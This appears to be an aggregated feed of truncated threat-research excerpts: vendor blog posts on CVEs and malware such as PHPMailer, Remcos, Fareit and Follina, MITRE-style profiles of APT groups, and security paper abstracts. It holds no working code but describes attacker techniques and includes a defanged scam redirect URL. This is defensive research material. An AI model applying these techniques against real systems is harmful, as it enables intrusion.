blogs_fortinet·2017-02-16·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer Powered – Use It, But Also Remember to Update It
FORTIGUARD LABS THREAT RESEARCH
PHPMailer Powered – Use It, But Also Remember to Update It
By Tien Phan | February 16, 2017
At the end of last year, a critical vulnerability in PHPMailer that affected millions of websites – CVE-2016-10033 - was discovered by Polish security researcher Dawid Golunski. This vulnerability allows an attacker to compromise the target’s web application by executing remote code on the vulnerable web server.
There are numerous open source web applications that use PHPMailer as their main library for sending emails, including WordPress, Joomla, Yii, SugarCRM…
More than a month after PHPMailer released a patch for this critical vulnerability we compiled this short research, and the result may surprise you. As you will see, there are still a lot of web open sourc
Fortinet
REMCOS: A New RAT In The Wild
blogs_fortinet·2017-02-14
REMCOS: A New RAT In The Wild
FORTIGUARD LABS THREAT RESEARCH
REMCOS: A New RAT In The Wild
By Floser Bacurio and Joie Salvio | February 14, 2017
Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, we’ve seen its payload being distributed in the wild for the first time.
This article demonstrates how this commercialized RAT is being used in an attack, and what its latest version (v1.7.3) is capable of doing. Remcos is currently being sold from $58 to $389, depending on the license period and the maximum number of masters or clients needed.
Macro Executes Malware with High System Privilege
We discovered that the Remcos RAT is being distributed through malicious Micr
Fortinet
Cloud is the New Normal: The Challenge of Securing Workloads in the Cloud – Are You Ready?
blogs_fortinet·2017-02-07
Cloud is the New Normal: The Challenge of Securing Workloads in the Cloud – Are You Ready?
INDUSTRY TRENDS & INSIGHTS
Cloud is the New Normal: The Challenge of Securing Workloads in the Cloud – Are You Ready?
By Katrina Fox | February 07, 2017
Microsoft Ignite – Australia – Gold Coast Convention and Exhibition
February 14-17th,
Pod Number: 49
Is cloud the new normal for your enterprise?
Are you moving more and more applications into the cloud?
Have you asked yourself how you are securing your data in this new world of cloud?
Scalability and flexibility are the key drivers of Cloud networking and computing. With more and more business transitioning to public cloud environments, the cloud is becoming an increasingly attractive target for hackers due to the sheer amount of data being stored in public clouds.
As a result, the number one concern for many organisations is how to
Fortinet
Watch Out For Fake Online Gaming Sites And Their Malicious Executables
blogs_fortinet·2017-02-06
Watch Out For Fake Online Gaming Sites And Their Malicious Executables
FORTIGUARD LABS THREAT RESEARCH
Watch Out For Fake Online Gaming Sites And Their Malicious Executables
By Lilia Elena Gonzalez Medina | February 06, 2017
Every year during holiday seasons, the number of phishing websites increases. This is particularly true for online gaming distribution platforms. In some cases, users not only have their login credentials stolen, but they also end up downloading and executing malicious executables. As expected, the more popular a platform is, the more targeted it will be, which is why this research blog focuses on two malware samples obtained from fake Origin and Steam websites.
Figure 1. Fake Origin phishing website
Origin Malware Sample
In addition to phishing websites that steal user credentials, we also examined a number of blogs that were being
Fortinet
LinkedIn and Baidu Redirecting to Fat-Loss and Brain Improvement Scam
blogs_fortinet·2016-12-06
LinkedIn and Baidu Redirecting to Fat-Loss and Brain Improvement Scam
FORTIGUARD LABS THREAT RESEARCH
LinkedIn and Baidu Redirecting to Fat-Loss and Brain Improvement Scam
By Nelson Ngu | December 06, 2016
We recently received a URL through Skype that caught our attention. It was a link belonging to LinkedIn, with our Skype ID as a parameter at the end of the URL.
hxxps://www.linkedin.com/slink?code=e2nsPHa#jpulusiv=victimskypeid
Usually, people would be wary when they receive links that look somewhat suspicious. But this link is from LinkedIn, the world's largest professional networking site, so it would be easy for anyone receiving it to quickly dismiss any thought of it being harmful. And the convincing personalized Skype ID at the end of the link only increases one's confidence and curiosity to just click on that link!
So what happens next?
Well, once you click
Fortinet
Cybersecurity In this New Political Era
blogs_fortinet·2016-11-14
Cybersecurity In this New Political Era
INDUSTRY TRENDS & INSIGHTS
Cybersecurity In this New Political Era
By Anthony Giandomenico | November 14, 2016
The next President of the United States will begin their term in the midst of dramatic transitions happening across the world. This isn’t about the deficit or foreign policy or climate change. Advisors well versed in strategies related to those issues surround the President.
What needs to be addressed is the global transition to a digital economy. This change is affecting every aspect of our society, from how businesses generate profit to how individuals live their lives and interact socially. The digital economy and society combine technologies and services to unlock new value in the form of better quality of life and better business outcomes. It is affecting every economic se
Fortinet
Microsoft Kernel Integer Overflow Vulnerability
blogs_fortinet·2016-10-31·CVSS 5.5
CVE-2016-0070 [MEDIUM] Microsoft Kernel Integer Overflow Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Microsoft Kernel Integer Overflow Vulnerability
By Honggang Ren | October 31, 2016
Last month I discovered and reported an integer overflow vulnerability in the Windows Registry. Last Tuesday, October 25th, Microsoft released Security Bulletin MS16-124, which contains the patch for this vulnerability, and identifies it as CVE-2016-0070.
This vulnerability could lead to local privilege elevation, and is rated as “Important” by Microsoft. The vulnerability affects multiple Windows versions, and Microsoft has recommended installing this update immediately.
In this blog I will share the details of this vulnerability.
How to Reproduce
To reproduce the vulnerability, follow the steps below.
Sign into Windows 7 with any non-admin account.
Run regedit.exe in
Fortinet
IBM Rational Collaborative Lifecycle Management XSS Vulnerability
blogs_fortinet·2016-10-17
IBM Rational Collaborative Lifecycle Management XSS Vulnerability
FORTIGUARD LABS THREAT RESEARCH
IBM Rational Collaborative Lifecycle Management XSS Vulnerability
By Honggang Ren | October 17, 2016
At the beginning of this year, I discovered and reported a Cross-Site Scripting (XSS) vulnerability in IBM Rational Collaborative Lifecycle Management (CLM). This month IBM released a security bulletin that contains the fix for this vulnerability.
In this blog, I want to share the details of this vulnerability.
How to Reproduce
To reproduce this vulnerability, you can follow the steps below:
Sign into CLM with a user account, such as “chbest2”, with the permission "JazzAdmins".
Then create a new user account “test123” with the permissions "JazzUsers" and "JazzProjectAdmins", and set the Client Access Licenses. See Figure 1 below.
Figure 1. Create a new
Fortinet
Analysis of OpenSSL Large Message Size Handling Use After Free (CVE-2016-6309)
blogs_fortinet·2016-10-12·CVSS 5.9
CVE-2016-6309 [MEDIUM] Analysis of OpenSSL Large Message Size Handling Use After Free (CVE-2016-6309)
FORTIGUARD LABS THREAT RESEARCH
Analysis of OpenSSL Large Message Size Handling Use After Free (CVE-2016-6309)
By Dehui Yin | October 12, 2016
OpenSSL released an emergency security update shortly after a patch was issued a few weeks ago. This security update addresses a critical Use After Free vulnerability introduced by the code that had been revised to resolve the earlier low-severity vulnerability CVE-2016-6307.
This critical Use After Free vulnerability (CVE-2016-6309) is caused by an error that occurs when relocating a message with an overlarge message size greater than 16k. Remote attackers may access the freed buffer to crash, or potentially even execute arbitrary code on vulnerable systems.
This Use After Free vulnerability only affects OpenSSL version 1.1.0a. In this report we
Fortinet
Analysis of Vulnerability CVE-2016-4957 in NTPD
blogs_fortinet·2016-06-20·CVSS 5.3
CVE-2016-4957 [MEDIUM] Analysis of Vulnerability CVE-2016-4957 in NTPD
FORTIGUARD LABS THREAT RESEARCH
Analysis of Vulnerability CVE-2016-4957 in NTPD
By Dehui Yin | June 20, 2016
The Network Time Protocol Daemon (NTPD) by NTP.org runs on *nix operating systems. It sets and maintains system time in synchronization with internet standard time servers or local reference clocks. NTPD is shipped with many major server operating systems, routers, and infrastructure devices.
CVE-2016-4957 is a high-severity vulnerability targeting NTPD. It causes a segfault that makes NTPD close. If the NTP service stops, it can affect many time-sensitive programs, such as database operations and server groups that need NTP to synchronize time with each other.
The ntp-4.2.8p8 update was released on Jun 02, 2016 to address this vulnerability, along with several
Fortinet
New Fareit Variant Analysis
blogs_fortinet·2016-05-06
New Fareit Variant Analysis
FORTIGUARD LABS THREAT RESEARCH
New Fareit Variant Analysis
By Xiaopeng Zhang | May 06, 2016
Fareit is a family of malware designed to steal confidential information. It has been around for several years, and typically steals system information and application credentials stored on infected systems.
Recently, our FortiGuard Lab captured a new Fareit variant which can be detected as virus Malicious_Behavior.VEX.99. The MD5 of this malware sample is f69a1384fc510aad8770f073bafe512f. In this blog, we want to share our findings about how this Fareit malware variant works.
What Confidential Information Is Collected From Victims?
The malware sample is a PE file. By reversing it, we can find the code which uses a loop to call all functions in a function list. These functions are used to coll
Fortinet
EXD: An attack surface for Microsoft Office
blogs_fortinet·2016-04-01
EXD: An attack surface for Microsoft Office
FORTIGUARD LABS THREAT RESEARCH
EXD: An attack surface for Microsoft Office
By Wayne Chin Yick Low | April 01, 2016
Fortinet has discovered a potential attack surface for Microsoft Office via EXD files. After a malformed or specifically crafted EXD file is placed in an expected location, it could trigger remote code execution when a document with ActiveX is opened with Office applications.
Type Library (TypeLib) vs Extender Type Library (EXD)
A type library (described as a TypeLib by MSDN) is familiar to anyone who regularly develops COM or ActiveX components, as one is always associated with these components. As quoted from MSDN, TypeLibs are binary files that include information about types and objects exposed by an ActiveX component and typically use TLB as the file name exten
Fortinet
Analysis of CVE-2016-0059 - Microsoft IE Information Disclosure Vulnerability Discovered by Fortinet
blogs_fortinet·2016-02-19·CVSS 7.8
By Kai Lu | February 19, 2016
Summary
This month Microsoft patched two vulnerabilities which were discovered and reported by me, one is an information disclosure vulnerability in Internet Explorer (IE) (CVE-2016-0059 in MS16-009), the other is a memory corruption vulnerability in Microsoft Office (CVE-2016-0055 in MS16-015). In this blog, we will provide in-depth analysis of CVE-2016-0059. The vulnerability exists because Microsoft Hyperlink Object Library improperly discloses the contents of its memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user’s system. To exploit the vulnerability,
Fortinet
Apache Commons Collections Under Attack
blogs_fortinet·2016-02-04·CVSS 9.8
By Dehui Yin | February 04, 2016
Two months ago, a Java zero-day vulnerability (CVE-2015-4852) affecting the Apache Commons Collections library was disclosed. This vulnerability arises when Java applications that use the Apache Commons Collections library deserialize objects from untrusted network sources. Let’s take a look:
Our Fortinet IPS team immediately created a signature, "Apache.Commons.Collection.InvokerTransformer.Code.Execution", in order to protect our customers, and continues to monitor. Over the last two months, since creating the initial signature, we have seen it triggered on average 400 times a day from 50 different FortiGates. This rate of alert is not very high; however, these alerts
Fortinet
CVE-2015-4400 : Backdoorbot, Network Configuration Leak on a Connected Doorbell
blogs_fortinet·2016-01-22·CVSS 4.6
By Ruchna Nigam | January 22, 2016
Summary
In March 2015, a Network Configuration Leak vulnerability was disclosed to Ring as part of FortiGuard's Responsible Disclosure process.
The vulnerability existed on their first internet-connected doorbell, Doorbot v1.0, but other posts on the subject show that the vulnerability was carried over to newer versions of the connected doorbell as well.
The vulnerability was assigned CVE-2015-4400: DoorBot Network Configuration Leak.
We have issued an Advisory and IPS signatures (DoorBot.Network.Configuration.Leak) for the same.
We have not been informed by Ring about any patches issued for the reported vulnerability.
Connected Doorbell?
The
Recorded Future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
blogs_recorded_future
# RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
Scope Note: Recorded Future analyzed new malware targeting the Tibetan community. This report includes a detailed analysis of the malware itself and associated infrastructure. Sources include Recorded Future’s platform, VirusTotal, ReversingLabs, and third-party metadata, as well as common OSINT and network metadata enrichments, such as DomainTools Iris and PassiveTotal, and researcher collaboration.[1] The impetus of this research is twofold: to provide indicators to leverage for protection for likely victims and to raise awareness of a possible shift in adversary TTPs.
### Executive Summary
Recorded Future’s Insikt Group has identified two new cyberespionage campa
Recorded Future
China Altered Public Data to Conceal MSS Influence | Recorded Future
blogs_recorded_future
## China Altered Public Vulnerability Data to Conceal MSS Influence
## Key Judgements
CNNVD altered the original publication dates in its public database for at least 267 vulnerabilities we identified as statistical outliers in our research published in November 2017.
We assessed in November that CNNVD had a formal vulnerability evaluation process in which high-threat CVEs were evaluated for their operational utility by the MSS before publication, and that the publication lag was one way to identify vulnerabilities that the MSS was likely considering for use in offensive cyber operations. CNNVD’s outright manipulation of these dates implicitly confirmed this assessment.
By retroactively changing the original publication dates on these statistical outliers, CNNVD attempted to hide the e
Threat Intel
MuddyWater (MuddyWater, Earth Vetala, MERCURY)
threat_intel
# Threat Actor Profile: MuddyWater
ATT&CK ID: G0069
Also known as: MuddyWater, Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450
Suspected origin: Iran
## Overview
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWate
Threat Intel
TA459 (TA459)
threat_intel·CVSS 7.8
# Threat Actor Profile: TA459
ATT&CK ID: G0062
Also known as: TA459
Suspected origin: China
## Overview
TA459 is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)
## Techniques (TTPs)
### Initial Access
- T1566.001 Spearphishing Attachment
Usage: TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.(Citation: Proofpoint TA459 April 2017)
### Execution
- T1203 Exploitation for Client Execution
Usage: TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.(Citation: Proofpoint TA459 April 2017)
- T1059.005 Visual Basic
Usage: TA459 has a VBScript for execution.(Citation: Proofpoint TA459 April 2017)
- T1204.002
Threat Intel
Cobalt Group (Cobalt Group, GOLD KINGSWOOD, Cobalt Gang)
threat_intel
# Threat Actor Profile: Cobalt Group
ATT&CK ID: G0080
Also known as: Cobalt Group, GOLD KINGSWOOD, Cobalt Gang, Cobalt Spider
## Overview
Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation
Recorded Future
Executive Takeaways From the 2017 Verizon Data Breach Investigation Report (DBIR)
blogs_recorded_future
# Beyond Scanners and NVD: Other Places to Find Useful Vulnerability Intelligence
### Key Takeaways
- Basic vulnerability management starts with using automated vulnerability scanners and relying on public databases like the U.S. National Vulnerability Database (NVD).
- However, those two sources alone can often leave you with insufficient time and information to respond to threats. Data produced by scanners can overwhelm analysts or lull them into a false belief that they have the complete picture, especially since the NVD has been proven to lag behind other sources of information.
- Threat intelligence provides the context needed to understand which vulnerabilities should be prioritized and which can be safely ignored.
- Other more direct sources of information include places like cybe
Threat Intel
APT41 (APT41, Wicked Panda, Brass Typhoon)
threat_intel
# Threat Actor Profile: APT41
ATT&CK ID: G0096
Also known as: APT41, Wicked Panda, Brass Typhoon, BARIUM
Suspected origin: China
## Overview
APT41 is a threat group that researchers have assessed to be a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.(Citation: apt41_mandiant) Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 202
Recorded Future
Executive Takeaways From the 2017 Verizon Data Breach Investigation Report (DBIR) | Recorded Future
blogs_recorded_future
## Beyond Scanners and NVD: Other Places to Find Useful Vulnerability Intelligence
## Key Takeaways
Basic vulnerability management starts with using automated vulnerability scanners and relying on public databases like the U.S. National Vulnerability Database (NVD).
However, those two sources alone can often leave you with insufficient time and information to respond to threats. Data produced by scanners can overwhelm analysts or lull them into a false belief that they have the complete picture, especially since the NVD has been proven to lag behind other sources of information.
Threat intelligence provides the context needed to understand which vulnerabilities should be prioritized and which can be safely ignored.
Other more direct sources of information include places like cybersecu
Threat Intel
Leviathan (Leviathan, MUDCARP, Kryptonite Panda)
threat_intel
# Threat Actor Profile: Leviathan
ATT&CK ID: G0065
Also known as: Leviathan, MUDCARP, Kryptonite Panda, Gadolinium, BRONZE MOHAWK, TEMP.Jumper, APT40, TEMP.Periscope, Gingham Typhoon
Suspected origin: China
## Overview
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proo
Recorded Future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 | Recorded Future
blogs_recorded_future
## Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report, and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.
## Executive Summary
Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to she
Recorded Future
The Increasing Affordability of Crimeware as a Service | Recorded Future
blogs_recorded_future
## The Increasing Affordability of Crimeware as a Service
## Key Takeaways
Many experienced hackers have shifted from directly attacking targets to creating products to sell to less tech-savvy customers.
This new business model of “crimeware as a service” resembles lawful business practices in many ways. Cybercriminals offer subscription services and competitive pricing, and look for ways to maximize their rate of return. Many focus on quantity over quality, with fewer vulnerabilities exploited more widely.
Threat intelligence becomes useful in identifying which vulnerabilities threat actors are actually targeting. Many threat intelligence vendors have access to privileged spaces, like private marketplaces on the dark web where these products and services are bought and sold, that can
Recorded Future
Microsoft Office Tops the Exploit Charts
blogs_recorded_future·CVSS 7.8
# Microsoft Office Tops the Exploit Charts
### Key Takeaways
- Recorded Future research shows that seven of the top 10 vulnerabilities exploited in 2017 targeted Microsoft products.
- At least two of these, CVE-2017-0199 and CVE-2017-0189, were critical vulnerabilities — their exploitation allowed threat actors to arbitrarily execute code or access and change data.
- Despite being aware of at least some of these vulnerabilities for many months, Microsoft did not immediately patch them, leaving users exposed. Patches were not released until after exploits targeting those vulnerabilities appeared for sale on the dark web.
- The pattern and timeline of vulnerability recognition and response shows that proprietors like Microsoft do not always disclose information about existing cybersecurity
Recorded Future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
blogs_recorded_future
# Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report, and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.
### Executive Summary
Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to shed
Huntress
Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress
blogs_huntress·CVSS 7.8
This post, as is the norm for emerging threats, is a developing article and may be subject to change as the Huntress team learns more about this attack vector and new information is available.
UPDATE 4:51pm ET June 14, 2022:
Microsoft announced an available patch for the Follina exploit. Our team has been working to validate the patch, and we have tested and verified that the patch is effective both for Windows 10 and Windows 11:
Just to note, your KB# may vary based on your operating system—check out Microsoft's update for the full list.
Below, the code fails to execute on Windows 10:
In the below image, the raw command fails on Windows 10:
UPDATE 11:16pm ET May 30, 2022:
Microsoft has now revealed the CVE identifier for this vulnerability is CVE-2022-30190, including a Security Up
Recorded Future
China's Influence on National Network Vulnerability Publications | Recorded Future
blogs_recorded_future·CVSS 7.8
## China’s Ministry of State Security Likely Influences National Network Vulnerability Publications
## Executive Summary
Earlier research based on the last two years of vulnerability reporting illustrated that China’s National Vulnerability Database of Information Security (CNNVD) was generally more aggressive in capturing up-to-date information for software vulnerabilities than its U.S. counterpart (NVD). In this research we examine exceptions to this general rule and discover a broader role for the Ministry of State Security (MSS) in vulnerability reporting than was previously known.
Recorded Future analysis has uncovered evidence of a formal vulnerability evaluation process at CNNVD in which High-threat CVEs are likely evaluated for their operational utility by the MSS before publica
Crowdstrike
Mustang Panda
blogs_crowdstrike·CVSS 7.5
Threat Intel
ProCC
threat_intel·CVSS 7.8
# Threat Actor: ProCC
## Description
ProCC is a threat actor targeting the hospitality sector with remote access Trojan malware. They use email attachments to exploit vulnerabilities like CVE-2017-0199 and deploy customized versions of RATs such as RevengeRAT, NjRAT, NanoCoreRAT, and 888 RAT. ProCC's malware is capable of collecting data from the clipboard and printer spooler, as well as capturing screenshots on infected machines.
Recorded Future
Microsoft Office Tops the Exploit Charts | Recorded Future
blogs_recorded_future·CVSS 7.8
## Microsoft Office Tops the Exploit Charts
## Key Takeaways
Recorded Future research shows that seven of the top 10 vulnerabilities exploited in 2017 targeted Microsoft products.
At least two of these, CVE-2017-0199 and CVE-2017-0189, were critical vulnerabilities — their exploitation allowed threat actors to arbitrarily execute code or access and change data.
Despite being aware of at least some of these vulnerabilities for many months, Microsoft did not immediately patch them, leaving users exposed. Patches were not released until after exploits targeting those vulnerabilities appeared for sale on the dark web.
The pattern and timeline of vulnerability recognition and response shows that proprietors like Microsoft do not always disclose information about existing cybersecurity thre
Recorded Future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community | Recorded Future
blogs_recorded_future
## RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
Scope Note: Recorded Future analyzed new malware targeting the Tibetan community. This report includes a detailed analysis of the malware itself and associated infrastructure. Sources include Recorded Future’s platform, VirusTotal, ReversingLabs, and third-party metadata, as well as common OSINT and network metadata enrichments, such as DomainTools Iris and PassiveTotal, and researcher collaboration.[1] The impetus of this research is twofold: to provide indicators to leverage for protection for likely victims and to raise awareness of a possible shift in adversary TTPs.
## Executive Summary
Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan community over the past two
Threat Intel
Mustang Panda (Mustang Panda, TA416, RedDelta)
threat_intel
# Threat Actor Profile: Mustang Panda
ATT&CK ID: G0129
Also known as: Mustang Panda, TA416, RedDelta, BRONZE PRESIDENT, STATELY TAURUS, FIREANT, CAMARO DRAGON, EARTH PRETA, HIVE0154, TWILL TYPHOON, TANTALUM, LUMINOUS MOTH, UNC6384, TEMP.Hex, Red Lich
Suspected origin: China
## Overview
Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. (Citatio
Fortinet
FortiGuard Labs Threat Research
blogs_fortinet·CVSS 7.8
THREAT RESEARCH
DPRK-Related Campaigns with LNK and GitHub C2
Analysis of DPRK-linked LNK-based attacks using GitHub as covert C2 infrastructure, detailing multi-stage PowerShell execution, persistence mechanisms, and data exfiltration techniques targeting Windows environments.
By Cara Lin April 02, 2026
THREAT RESEARCH
Cyber Fallout After the Strikes: Signal, Noise, and What Comes Next
Following U.S.-Israeli strikes on Iran, FortiGuard Labs has not yet observed large-scale cyber retaliation. However, we observed that regional cyber activity is rising. Organizations should take action to strengthen cyber hygiene, rotate credentials, and reduce exposure.
By Aamir Lakhani, Carl Windsor, and Derek Manky March 04, 2026
THREAT RESEARCH
U
Recorded Future
China Altered Public Data to Conceal MSS Influence
blogs_recorded_future
# China Altered Public Vulnerability Data to Conceal MSS Influence
### Key Judgements
- CNNVD altered the original publication dates in its public database for at least 267 vulnerabilities we identified as statistical outliers in our research published in November 2017.
- We assessed in November that CNNVD had a formal vulnerability evaluation process in which high-threat CVEs were evaluated for their operational utility by the MSS before publication, and that the publication lag was one way to identify vulnerabilities that the MSS was likely considering for use in offensive cyber operations. CNNVD’s outright manipulation of these dates implicitly confirmed this assessment.
- By retroactively cha
Threat Intel
BlackTech (BlackTech, Palmerworm)
threat_intel·CVSS 9.8
# Threat Actor Profile: BlackTech
ATT&CK ID: G0098
Also known as: BlackTech, Palmerworm
Suspected origin: China
## Overview
BlackTech is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. BlackTech has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)
## Techniques (TTPs)
### Resource Development
- T1588.003 Code Signing Certificates
Usage: BlackTech has used stolen code-signing certificates for its malicious pay
Recorded Future
The Increasing Affordability of Crimeware as a Service
blogs_recorded_future
# The Increasing Affordability of Crimeware as a Service
### Key Takeaways
- Many experienced hackers have shifted from directly attacking targets to creating products to sell to less tech-savvy customers.
- This new business model of “crimeware as a service” resembles lawful business practices in many ways. Cybercriminals offer subscription services and competitive pricing, and look for ways to maximize their rate of return. Many focus on quantity over quality, with fewer vulnerabilities exploited more widely.
- Threat intelligence becomes useful in identifying which vulnerabilities threat actors are actually targeting. Many threat intelligence vendors have access to privileged spaces, like private marketplaces on the dark web where these products and services are bought and sold, that
Threat Intel
APT37 (APT37, InkySquid, ScarCruft)
threat_intel
# Threat Actor Profile: APT37
ATT&CK ID: G0067
Also known as: APT37, InkySquid, ScarCruft, Reaper, Group123, TEMP.Reaper, Ricochet Chollima
Suspected origin: China
## Overview
APT37 is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. APT37 has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123)
North Korean group definitions are
Huntress
CVE-2017-0199 Vulnerability: Analysis, Impact, Mitigation | Huntress
blogs_huntress·CVSS 7.8
## CVE-2017-0199 Vulnerability
Published: 12/05/2025
Written by: Lizzie Danielson
## What is CVE-2017-0199 vulnerability?
CVE-2017-0199 is a Remote Code Execution (RCE) vulnerability in Microsoft Office and WordPad. It arises through the improper handling of Object Linking and Embedding (OLE) objects, enabling attackers to execute arbitrary code by sending a maliciously crafted document or RTF (Rich Text Format) file. Exploiting this vulnerability can grant attackers the ability to compromise systems, steal sensitive data, or perform lateral movement across networks.
## When was it discovered?
CVE-2017-0199 was first disclosed on April 11, 2017, with a formal security update released by Microsoft on the same day. Security researchers discovered the vulnerability after observing targe
Threat Intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
threat_intel
# Threat Actor Profile: Patchwork
ATT&CK ID: G0040
Also known as: Patchwork, Hangover Group, Dropping Elephant, Chinastrats, MONSOON, Operation Hangover
Suspected origin: China
## Overview
Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Cita
Zscaler
Zscaler protects against 16 new vulnerabilities for MS
blogs_zscaler·CVSS 7.8
Recorded Future
China's Influence on National Network Vulnerability Publications
blogs_recorded_future·CVSS 7.8
# China’s Ministry of State Security Likely Influences National Network Vulnerability Publications
### Executive Summary
Earlier research based on the last two years of vulnerability reporting illustrated that China’s National Vulnerability Database of Information Security (CNNVD) was generally more aggressive in capturing up-to-date information for software vulnerabilities than its U.S. counterpart (NVD). In this research we examine exceptions to this general rule and discover a broader role for the Ministry of State Security (MSS) in vulnerability reporting than was previously known.
Recorded Future analysis has uncovered evidence of a formal vulnerability evaluation process at CNNVD in which High-threat CVEs are likely evaluated
arXiv
KillChainGraph: ML Framework for Predicting and Mapping ATT&CK Techniques
arxiv_fulltext·2025-08-19
Chitraksh Singh (ORCID 0009-0000-1020-8989), Frondeur Labs, Mumbai, Maharashtra, India
Monisha Dhanraj (ORCID 0009-0009-8593-1632), Frondeur Labs, Bengaluru, Karnataka, India
Ken Huang (ORCID 0009-0004-6502-3673), DistributedApps.ai, OWASP, Fairfax, VA, USA
## Abstract
The escalating complexity and volume of cyberattacks demand proactive detection strategies that go beyond traditional rule-based systems. This paper presents a phase-aware, multi-model machine learning framework that emulates adversarial behavior across the seven phases of the Cyber Kill Chain using the MITRE ATT&CK Enterprise dataset. Techniques are semantically mapped to phases via A
arXiv
CLIProv: A Contrastive Log-to-Intelligence Multimodal Approach for Threat Detection and Provenance Analysis
arxiv_fulltext·2025-07-12
Jingwen Li (Beijing University of Posts and Telecommunications, Beijing 100876, China): Conceptualization, Methodology, Writing – original draft
Ru Zhang (Beijing University of Posts and Telecommunications; ORCID 0000-0001-6641-3236; corresponding author): Supervision, Writing – review & editing
Jianyi Liu (Beijing University of Posts and Telecommunications): Methodology, Writing – review & editing, Resources
WanGuo Zhao (Beijing Anheng Xin'an Technology Co., Ltd, Beijing 100089, China): Data curation, Resources
## Abstract
With the increasing complexity of cyberattacks, the proactive and f
arXiv
PentestAgent: Incorporating LLM Agents to Automated Penetration Testing
arxiv_fulltext·2025-05-29
